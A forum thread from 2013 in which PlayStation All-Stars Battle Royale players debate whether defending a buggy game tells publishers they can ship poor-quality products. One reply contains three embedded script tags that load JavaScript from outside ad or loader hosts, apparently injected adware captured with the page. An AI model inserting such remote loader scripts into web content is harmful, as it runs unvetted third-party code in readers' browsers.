Showing results for 
Search instead for 
Do you mean 
Apr 13 2013
By: Aylas_Hero Survivor 2365 posts

A Different Look At Glitches In PSASBR

11 replies 312 views Edited Apr 13, 2013

Hello everyone, I feel like getting all of your brains working with this thread.

Many people complain about things like the bad netcode, not getting titles, and all the other various glitches in this game.

It would be a lie to say this game has NO glitches. It is a pure and simple fact that this game has many bugs and this decreases the quality of the game considerably for many who play it.

Here is the interesting question. We all know this game is indiputably buggy. Yet many of us still defend it bugs and all and play the game with loyalty.

What if by doing things like this, we are showing companies that we will rationalize having a bad game, and thus show them they can produce games with poor quality standards as we will still play them and buy them, and even DEFEND the game?

Games used to have VERY little bugs. Now that patching is available they tend to send out games with tons of crap in them figuring they can fix them later because you will buy, play, and defend a favorite title anyways. Or they may not even fix the bugs at all knowing you'll still do the same.

So, consider those who blindly defend the game despite glitches that your attitudes may be hurting the entire game industry as a whole when you do so, not just for this game but for others that may have similar problems. This community right here could be showing a large corporation that they can feed us crap and we'll take it anyways, thus showing them they can save money by making crap and branding it correctly.

Food for thought.

Please use plain text.
Message 1 of 12 (312 Views)
Uncharted Territory
1418 posts

Re: A Different Look At Glitches In PSASBR

Apr 13, 2013

Totally agree Erik we need to make sure that we get these problems fixed I would hate a generation when we have nothing but buggy games. Kudos and thanks for making a thougtfull thread.

Please use plain text.
Message 2 of 12 (302 Views)
0 Likes
I Only Post Everything
1104 posts

Apr 13, 2013
Games used to have much fewer bugs? Thats not true at all, the internet wasnt as relevant so they were less noticed. And people just enjoyed their games
This is relevant to my inetrest
Please use plain text.
Message 3 of 12 (293 Views)
Gaming Beast
2167 posts

Apr 13, 2013
OBJECTION!

I call Superman 64 to the stand.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 4 of 12 (265 Views)
Uncharted Territory
1704 posts

Apr 13, 2013

They MAY have few fewer bugs, but not by a huge margin.

The main deal is that when you bought them, thats it. thats all you get.

So you better enjoy your **bleep** game! As for now, most games have day 1 patches -.-

Please use plain text.
Message 5 of 12 (261 Views)
I Only Post Everything
1025 posts

Apr 13, 2013
You mean... Not play this game? I'm... Just not ready yet. You bring up a very good point however. If I'm not mistaken, games take WeEKs to become certified patches before they go live for the gamers, making sure there is no bugs etc etc. This was an amateur dev team made game and well never know the entire reasoning as to why they broke up with Sony, whatever.

My theory is that yeah, some of the glitches which cause cause the game to freeze right before a fight or have the announcer on loop screaming FIGhT! Happen to me, but very rarely and same for a majority of other players of this game, stuff and bugs like this had to of just barely made it through these certifications, or maybe they just don't know how to fix them without causing more problems? This game may just have very intricate or poor balancing.

I understand that You guys have sent them numerous e mails about these bugs and glitches etc.. And it's soooo fukced up that these game companies aren't allowed to communicate with fans until contact BS is met. But that's the price for the Sony advertising I suppose.

Just throwing it out there, do they game companies lie when they say fans are their everything? It's mind boggling like I said how they wouldn't be more in contact, but that doesn't mean they aren't aware.

If things like the sackboy 3 epidemic back when this game first dropped, Drake gun loop, Parrappa boombox glitch( still out there eh), and Other game breaking glitches were out there, than a patch and news would not be far away. Unless they just run out of money and can no longer support the game, but at least we have word that something's coming.

Now it looks like I'm defending the game.. Im not, just very neutral. On one hand, it's unbelievable that all These bugs and glitches are present for amateur tournament players and how frustrating it is, but I still doubt they would kill off another portion of the players left by ignoring their dedication.

I play this game A LOT, a lot a lot a lot . And Helll, I even rep radec who gets a terrible rep and is very hard to play well. Despite all these bugs and glitches i still have big a chub for him as I did in the beta and this goes the same for many other players playing. All we know is that this game has potential and they can only learn from their mistakes and improve on everything else.. Oh, and wait forever for balance and words from the devs.

Please use plain text.
Message 6 of 12 (259 Views)
0 Likes
Fender Bender
3649 posts

Apr 13, 2013

YOUR ALIVE!?

Not seen you here for a long time.

Please use plain text.
Message 7 of 12 (215 Views)
0 Likes
Fender Bender
3750 posts

Apr 13, 2013
While I think you do make some good points aylas_hero, with smaller titles that weren't super popular but are still fun/good in many ways making a stand against bugs would hurt the game and possibly future games. With massive games like cod and skyrim glitches should not be let go because those are massively popular games and so the work to fix glitches and not even have many should be guaranteed. But with a small game, made by a small dev team that wasn't massively popular, by refusing support it, no matter how good the core game is or the potential of the game, you are telling Sony that they shouldn't try to do anything other than pump out generic games that don't bring anything to the table but sell. The dev team and series will likely suffer and might even be let go/cancelled entirely (this game already wasn't enough for Sony to keep superbot). In summary, by refusing to support a franchise we enjoy we do it more damage than help unless it was successful anyway, but then your effort isn't noticed and things likely won't change or we can instead help the devs by suggesting fixes telling them about bugs etc.

Universal Notation: n=neutral f=forward b=backward u=up d=down 1=square 2=triangle 3=circle

Please use plain text.
Message 8 of 12 (202 Views)
Treasure Hunter
5661 posts

Apr 13, 2013
By writing off All Stars for its bugs, I really doubt SSM would turn around and think 'we should put our whole team on fixing every little problem anyone's ever experienced'. They'd just shelf it, leaving the prospects of a sequel on par with that of Heavenly Sword.
Photobucket Pictures, Images and Photos
Please use plain text.
Message 9 of 12 (197 Views)
Lombax Warrior
95 posts

Apr 13, 2013
"showing a large corporation that they can feed us crap and we'll take it anyways, thus showing them they can save money by making crap and branding it correctly" *looks at EA* Madden is a perfect example. They won't even take the time to fix glitches that have been in every installment. Why? Because they know people will still buy them.
Please use plain text.
Message 10 of 12 (145 Views)
0 Likes